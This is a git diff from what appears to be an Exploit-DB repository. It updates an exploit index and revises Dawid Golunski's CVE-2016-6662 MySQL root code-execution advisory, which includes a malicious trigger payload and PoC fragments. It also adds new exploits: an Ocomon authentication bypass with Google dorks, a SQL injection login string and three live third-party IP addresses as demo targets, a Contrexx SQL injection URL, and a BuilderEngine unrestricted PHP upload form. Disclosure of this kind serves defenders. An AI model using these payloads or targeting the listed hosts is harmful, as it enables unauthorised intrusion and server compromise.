38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0
38608,platforms/php/webapps/38608.txt,"Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0
38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
@ -34988,7 +34998,7 @@ id,file,description,date,author,platform,type,port
38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote,0
38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote,0
38638,platforms/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0
38639,platforms/php/webapps/38639.txt,"miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
38639,platforms/php/webapps/38639.txt,"Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0
38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0
38641,platforms/multiple/webapps/38641.rb,"JSSE - SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
38643,platforms/php/webapps/38643.txt,"WordPress Plugin Pie Register - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
@ -35263,10 +35273,10 @@ id,file,description,date,author,platform,type,port
38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast! - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
38933,platforms/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
38934,platforms/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0
38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0
38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0
@ -35448,14 +35458,14 @@ id,file,description,date,author,platform,type,port
39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0
39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
39133,platforms/php/webapps/39133.php,"Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0
39135,platforms/php/webapps/39135.php,"WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0
39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0
@ -35646,7 +35656,7 @@ id,file,description,date,author,platform,type,port
39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555
39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0
39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
@ -35834,7 +35844,7 @@ id,file,description,date,author,platform,type,port
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80
39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0
39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
39530,platforms/windows/dos/39530.txt,"Avast! - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0
39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
@ -36045,7 +36055,7 @@ id,file,description,date,author,platform,type,port
39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80
39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80
39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80
39761,platforms/php/webapps/39761.txt,"Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80
39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80
39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
@ -36129,7 +36139,7 @@ id,file,description,date,author,platform,type,port
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39848,platforms/php/webapps/39848.py,"Wordpress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection)",2016-05-24,"Mehmet Ince",asp,webapps,80
39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
@ -36253,7 +36263,7 @@ id,file,description,date,author,platform,type,port
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla! Component BT Media (com_bt_media) - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39978,platforms/php/webapps/39978.php,"Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80
@ -36512,6 +36522,7 @@ id,file,description,date,author,platform,type,port
40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
40284,platforms/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps,0
40285,platforms/php/webapps/40285.txt,"Ocomon 2.0 - SQL Injection",2016-08-22,"Jonatas Fil",php,webapps,80
40286,platforms/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps,0
40288,platforms/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80
40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0


@ -1,3 +1,5 @@
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
@ -5,6 +7,8 @@
- CVE-2016-6662
- Release date: 12.09.2016
- Last updated: 23.09.2016
- Revision: 3
- Severity: Critical
=============================================
@ -12,9 +16,9 @@
I. VULNERABILITY
-------------------------
MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation (0day)
5.6.33
5.5.52
MySQL <= 5.7.14 Remote Root Code Execution / Privilege Escalation (0day)
5.6.32
5.5.51
MySQL clones are also affected, including:
@ -63,8 +67,6 @@ A successful exploitation could allow attackers to execute arbitrary code with
root privileges which would then allow them to fully compromise the server on
which an affected version of MySQL is running.
Official patches for the vulnerability are not available at this time for Oracle
MySQL server.
The vulnerability can be exploited even if security modules SELinux and AppArmor
are installed with default active policies for MySQL service on major Linux
distributions.
@ -160,13 +162,16 @@ in a '[mysqld]' or '[mysqld_safe]' section.
If an attacker managed to inject a path to their malicious library within the
config, they would be able to preload an arbitrary library and thus execute
arbitrary code with root privileges when MySQL service is restarted (manually,
via a system update, package update, system reboot etc.)
arbitrary code with root privileges when MySQL service is restarted.
The restart could be triggered manually, via a system update, package update
(including an update of dependencies), system reboot etc.).
Attackers might also be able to speed up the server restart remotely by issuing
a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin.
In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that
allowed users to create mysql config files with a simple statement:
SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf'
SELECT * INTO OUTFILE '/var/lib/mysql/my.cnf'
The issue was fixed by refusing to load config files with world-writable
permissions as these are the default permissions applied to files created
@ -183,11 +188,12 @@ successfully bypass current restrictions by abusing MySQL logging functions
(available in every MySQL install by default) to achieve the following:
1) Inject malicious configuration into existing MySQL configuration files on
systems with weak/improper permissions (configs owned by/writable by mysql user).
systems with weak/improper permissions (configs owned by/writable by mysql user)
(SCENARIO 1).
2) Create new configuration files within a MySQL data directory (writable
by MySQL by default) on _default_ MySQL installs without the need to rely on
improper config permisions.
improper config permissions (SCENARIO 2).
3) Attackers with only SELECT/FILE permissions can gain access to logging
functions (normally only available to MySQL admin users) on all of the
@ -195,12 +201,59 @@ _default_ MySQL installations and thus be in position to add/modify MySQL
config files.
Update (16/09/2016):
The proof of concept details below should be read closely as there have been
some misconceptions noticed on some security forums which incorrectly try
to lessen the severity of this vulnerability due to a lack of correct
understanding of the issues presented in this advisory.
It should be noted that:
* SCENARIO 2 (point 2 above) is _independent_ of SCENARIO 1 (point 1 above).
I.e the config injection vulnerability which ultimately leads to loading
arbitrary malicious shared libraries CAN be exploited EVEN if there are NO
my.cnf config files with insecure permissions available on the system.
In other words, weak permissions are NOT a requirement for exploitation, and
the vulnerability CAN be exploit on affected DEFAULT PerconaDB/MariaDB/MySQL
installations with CORRECT permissions set on ALL my.cnf files available on
the system by default.
The SCENARIO 1 has only been presented as it makes the exploit code much
simpler and allows to explain the logging abuse/config injection vulnerability
without exposing default installations (SCENARIO 2) to an immediate risk.
* The researcher has created a private working PoC that has not been shared
publicly which CAN successfully exploit SCENARIO 2 (default setup/no incorrect
permissions on any of the default my.cnf config files). As noted both in the
section below as well as in the current PoC exploit's comments, the current
PoC is limited. It has been purposefully limited to protect immediate
exploitation of default installations (no incorrect perms on my.cnf) and give
users time to react to the vulnerability.
* A successful exploitation of SCENARIO 2 (no my.cnf available with weak perms)
leading to root privilege escalation/code execution can _ALSO_ (however is NOT a
requirement) be achieved by means of a (separate) vulnerability: CVE-2016-6663.
PoC has been created by the author of this advisory but not released publicly.
* The logging facility CAN be accessed by standard users with SELECT/FILE
privileges only. I.e SUPER privilege is NOT required to create malicious triggers
which contain the malicious payload that grants the attacker access to the
logging facility DESPITE the LACK of administrative privileges.
This has been explained in the section below (see point 3 in the section below)
and proven in the current PoC in this advisory and can also be observed in the
replication steps (see VI. section) that show the attacker database account
permissions (the attacker DB account is NOT assigned SUPER permissions).
* The exploitation requires a restart that could happen via a number of ways.
Attackers might also be able to speed up the server restart remotely by issuing
a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin.
V. PROOF OF CONCEPT
-------------------------
1) Inject malicious configuration into existing MySQL configuration files on
systems with weak/improper permissions (configs owned by/writable by mysql user).
(SCENARIO 1)
~~~~~~~~~~~~~~~~~~~~~~~~~
MySQL configuration files are loaded from all supported locations and processed
@ -243,7 +296,7 @@ need only read access:
shell> chown mysql /etc/my.cnf"
Moreover, there are also MySQL recipes for installation automatation software
Moreover, there are also MySQL recipes for installation automation software
such as Chef that also provide users with vulnerable permissions on my.cnf
config files.
@ -315,15 +368,16 @@ mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before the startup of mysqld daemon.
The preloaded library can then hook the libc fopen() calls and clean up
the config before it is ever processed by mysqld daemon in order for it
to start up successfully.
to start up successfully so that the compromise goes unnoticed by the
system administrators etc.
~~~~~~~~~~~~~~~~~~~~~~~~~
2) Create new configuration files within a MySQL data directory (writable
by MySQL by default) on _default_ MySQL installs without the need to rely on
improper config permisions.
improper config permissions.
(SCENARIO 2)
Analysis of the mysqld_safe script has shown that in addition to the
@ -424,14 +478,15 @@ a valid [section] header with the message:
error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1
Fatal error in defaults handling. Program aborted
Further testing has however proved that it is possible to bypass this security
restriction as well but these will not be included in this advisory for the
time being.
Further testing has however proven that IT IS possible to bypass this security
restriction as well but this will not be included in this advisory/PoC for the
time being.
It is worth to note that attackers could use one of the other vulnerabilities discovered
by the author of this advisory which has been assigned a CVEID of CVE-2016-6662 and is
pending disclosure. The undisclosed vulnerability makes it easy for certain attackers to
create /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege
It is worth to note that attackers could use one of the other vulnerabilities
discovered by the author of this advisory which has been assigned a CVEID of
CVE-2016-6663 and is pending disclosure.
The undisclosed vulnerability makes it easy for certain attackers to create
/var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege
requirement.
@ -447,7 +502,8 @@ If attackers do not have administrative rights required to access logging settin
and only have standard user privileges with the addition of FILE privilege then
they could still gain the ability to write to / modify configuration files.
This could be achieved by writing a malicious trigger payload:
This could be achieved by writing a malicious trigger payload - a trigger
definition that is an _equivalent_ to the following statement:
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
AFTER INSERT
@ -464,20 +520,26 @@ malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'
set global general_log = off;
END;
into a trigger definition/configuration file (.TRG) of an actively used table
('active_table') with the use of a statement similar to:
into a trigger file of an actively used table ('active_table') with the
use of a statement similar to:
SELECT '...trigger_definition...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG'
SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG'
Note that _only_ the above SELECT statement is required to write out the trigger
definition by abusing the power of FILE privilege.
The CREATE TRIGGER statement is _never_ executed and is not necessary. This
means that SUPER privilege is not necessary either. See the exploit code for
details.
Such trigger will be loaded when tables get flushed. From this point on
whenever an INSERT statement is invoked on the table, e.g:
INSERT INTO `active_table` VALUES('xyz');
The trigger's code will be executed with mysql root user privileges (see
'definer' above) and will thus let attacker to modify the general_log settings
despite the lack of administrative privileges on their standard account.
The trigger's code will be executed with mysql root/admin privileges (notice
'DEFINER' above) and will thus let attacker to modify the general_log settings
despite the lack of administrative/SUPER privileges through their user account
(with SELECT/FILE privileges only).
------------------
@ -607,8 +669,9 @@ with open(hookandrootlib_path, 'rb') as f:
content = f.read()
hookandrootlib_hex = binascii.hexlify(content)
# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG
# Decoded payload (paths may differ):
# Trigger payload that will elevate user privileges and successfully execute SET GLOBAL GENERAL_LOG
# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges)
# Decoded payload (paths may differ) will look similar to:
"""
DELIMITER //
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf
@ -905,6 +968,9 @@ For example, /etc/mysql/my.cnf on Debian:
3. Run the exploit as the attacker and restart mysql when exploit
is done.
Note that attackers could be able to force this step remotely by
issuing a remote SHUTDOWN command/SQL statement.
As attacker:
~~~~~~~~
@ -1002,7 +1068,6 @@ exit
VII. BUSINESS IMPACT
-------------------------
@ -1020,7 +1085,12 @@ Successful exploitation could gain a attacker a remote shell with root privilege
which would allow them to fully compromise the remote system.
If exploited, the malicious code would run as soon as MySQL daemon gets
restarted. MySQL service restart could happen for a number of reasons.
restarted.
As mentioned, the restart could be triggered manually, via a system update,
package update (including an update of dependencies), system reboot etc.).
Attackers might also be able to speed up the server restart remotely by issuing
a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin.
VIII. SYSTEMS AFFECTED
@ -1032,7 +1102,8 @@ of this advisory.
Some systems run MySQL via Systemd and provide direct startup path to mysqld
daemon instead of using mysqld_safe wrapper script. These systems however are
also at risk as mysqld_safe may be called on update by the installation scripts
or some other system services.
or some other system services. It could also be triggered manually by
administrators running mysqld_safe as a habit.
Because the exploit only accesses files normally used by MySQL server (
such as the config), and the injected library is preloaded by mysqld_safe startup
@ -1048,16 +1119,16 @@ The vulnerability was reported to Oracle on 29th of July 2016 and triaged
by the security team.
It was also reported to the other affected vendors including PerconaDB and MariaDB.
The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of
30th of August.
During the course of the patching by these vendors the patches went into
The vulnerabilities were patched by PerconaDB and MariaDB vendors in all branches
by 30th of August.
During the course of the patching process by these vendors the patches went into
public repositories and the fixed security issues were also mentioned in the
new releases which could be noticed by malicious attackers.
As over 40 days have passed since reporting the issues and patches were already
mentioned publicly, a decision was made to start disclosing vulnerabilities
(with limited PoC) to inform users about the risks before the vendor's next
CPU update that only happens at the end of October.
mentioned publicly (by Percona and MariaDB) , a decision was made to start
disclosing vulnerabilities (with limited PoC) to inform users about the risks
before the vendor's next CPU update (scheduled for 18th of October).
No official patches or mitigations are available at this time from the vendor.
As temporary mitigations, users should ensure that no mysql config files are
@ -1066,6 +1137,23 @@ use.
These are by no means a complete solution and users should apply official vendor
patches as soon as they become available.
Update (16/09/2016):
It has been found that the vendor silently (i.e. without notifing the researcher
via a direct communication despite the ongoing private communication via email,
nor via releasing an immediate public Security Alert to publicly announce the
critical fixes) released security patches for the CVE-2016-6662 vulnerability in
the following releases:
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html
which changes the vulnerable/exploitable version list to the following:
MySQL <= 5.7.14
5.6.32
5.5.51
X. REFERENCES
-------------------------
@ -1079,6 +1167,17 @@ http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py
http://legalhackers.com/exploits/mysql_hookandroot_lib.c
MySQL releases containing security fixes:
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html
which can be downloaded from:
http://dev.mysql.com/downloads/mysql/
https://mariadb.org/mariadb-server-versions-remote-root-code-execution-vulnerability-cve-2016-6662/
https://security-tracker.debian.org/tracker/CVE-2016-6662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662
The old vulnerability fixed in MySQL version 3.23.55:
@ -1096,10 +1195,18 @@ XII. REVISION HISTORY
-------------------------
12.09.2016 - Advisory released publicly as 0day
16.09.2016 - Updated the IV section with important notes to clarify
misconceptions observed on some security forums.
16.09.2016 - Updated the IX section to add information about fixed releases
along with I and II sections to reflect these.
22.09.2016 - Updated V. 3) section and fixed some typos.
23.09.2016 - Added notes about potential use of SHUTDOWN command/SQL statement
that remote attackers could use in order to speed up the restart.
XIII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
responsibility for any damage caused by the use or misuse of this information.

58
platforms/php/webapps/40285.txt Executable file

@ -0,0 +1,58 @@
# Exploit Title: Ocomon 2.0: Acess administrative Bypass / Multiple Sql
Injection
# Google Dork: inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
# Date: 2016.08.18
# Exploit Author: Jonatas Fil a.k.a pwx
# Vendor Homepage: ninj4c0d3r.github.io
# Version: Latest 2.0RC6
# Tested on: Linux And Windows
# CVE : CVE-2005-4664
\xDetails:
========================================
[Software]
- Ocomon
[Bug Summary]
- Multiple SQL Injection (SQLi)
[Impact]
- High
[Affected Version]
- Latest 2.0RC6
- Prior versions may also be affected
=========================================
\x01- Search by dork in google
Dorks:
inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
\x02 - After, To find the victim, open the inspect element in admin page.
\x03 - Look for the parameter: <body>: <table>: <tbody>: <tr>, and return
valida() and delete the content, leaving blank.
\x04 - After, Sign in using: "admin'or'" For Username and Password.
\x05 - Finish!, You get acess in administrative page to the system.
--------------------------------------------
\xDEMO:
http://200.66.111.38/ocomon/index.php
http://191.241.229.210:8080/ocomon/index.php
http://191.241.229.210:8081/ocomon/index.php
---------------------------------------------
References:
https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html
http://www.cvedetails.com/cve/CVE-2005-4664/
http://www.securityfocus.com/bid/15386/exploit
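Review bot: The header cites CVE-2005-4664 for a 2016 test of "Latest 2.0RC6", and the three references (the packetstorm "Ocomon-2.0RC6-SQL-Injection" entry, cvedetails for CVE-2005-4664, BID 15386) all point back to that 2005 identifier, so the advisory should state whether this is the same never-fixed login injection or a rediscovery; as written a reader cannot tell if a new CVE is warranted. The DEMO block lists three live third-party hosts; an archived advisory should not carry them, and the `http://server/...` placeholder used by 40366.txt and 40423.txt in this same commit is the convention to follow. The step list also describes removing a client-side `valida()` check, which is worth stating explicitly as "authentication is only validated client-side" since that is the defect a maintainer would fix.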

11
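--- /dev/null
+++ b/platforms/php/webapps/40366.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Contrexx CMS:egov moudle SQL injection
+# Google Dork: inurl:?section=egov
+# Date: 12/9/2016
+# Exploit Author: hamidreza borghei
+# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8
+# Version: 1.0.0
+# Tested on: linux
+sql injection in id parameter:
+http://server/index.php?section=egov&cmd=details&id=[sql query]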

28
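--- /dev/null
+++ b/platforms/php/webapps/40390.php
@@ -0,0 +1,28 @@
+<!--
+# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
+# Date: 18/09/2016
+# Exploit Author: metanubix
+# Vendor Homepage: http://builderengine.org/
+# Software Link: http://builderengine.org/page-cms-download.html
+# Version: 3.5.0
+# Tested on: Kali Linux 2.0 64 bit
+# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
+1) Unauthenticated Unrestricted File Upload:
+POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
+Vulnerable Parameter: files[]
+We can upload test.php and reach the file via the following link:
+/files/test.php
+-->
+<html>
+<body>
+<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
+<input type="file" name="files[]" />
+<input type="submit" value="send" />
+</form>
+</body>
+</html>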
